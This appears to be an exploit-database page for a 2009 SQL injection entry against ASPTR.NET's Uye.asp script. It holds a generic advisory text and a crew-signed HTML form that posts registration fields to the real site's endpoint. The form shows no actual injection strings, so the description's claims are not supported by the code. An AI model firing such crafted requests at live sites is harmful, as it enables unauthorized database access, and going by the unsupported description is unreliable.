header-logo
Suggest Exploit
vendor:
Uye.asp
by:
IMHATIMI.ORG, MecTruy, Dr.Ly0n, Noxy, FreWaL
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Uye.asp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ASPTR.NET SQL Injection Vulnerability

ASPTR.NET is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'Uye.asp' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with malicious SQL statements to the vulnerable script. Successful exploitation of this vulnerability can result in unauthorized access to sensitive information, such as usernames and passwords, and can also lead to the execution of arbitrary SQL commands.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.
Source

Exploit-DB raw data:

##################################################################################
<frewal>
Target site :<form method="POST" action="http://www.asptr.net/Uye.asp?Uye=Kaydet">
<p>Password : <input type="text" name="sifre" size="49" value="sifre"></p>
<p>E-Mail : <input type="text" name="mail" size="49" value="mail"></p>
<p>Secret question : <input type="text" name="soru" size="49" value="soru"></p>
<p><span id="result_box" class="short_text"><span style title>Reply
: </span></span><input type="text" name="cevap" size="49" value="cevap"></p>
<p>Name : <input type="text" name="ad" size="49" value="ad"></p>
<p>Last Name : <input type="text" name="soyad" size="49" value="soyad"></p>
<p>Dont Changing : <select size="1" name="sehir" id="sehir">
<option value="Adana">Adana</option></p>
<p>Profession :<input type="text" name="meslek" size="49" value="meslek"></p>
<p>Msn :<input type="text" name="msn" size="49" value="msn"></p>
<p>Web :<input type="text" name="web" size="49" value="web"></p>
<p>
Sex
:<select name="cinsiyet" size="1">
<option>Bay</option>
<option>Bay</option>
<option>Bayan</option>
</select>
</p>
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
<p> </p>
<p> </p>

</form>
</frewal>

##################################################################################

Crew : IMHATIMI.ORG ~ MecTruy ~ Dr.Ly0n ~ Noxy ~ FreWaL

##################################################################################

Navigation

Suggest Exploit

Services By CQR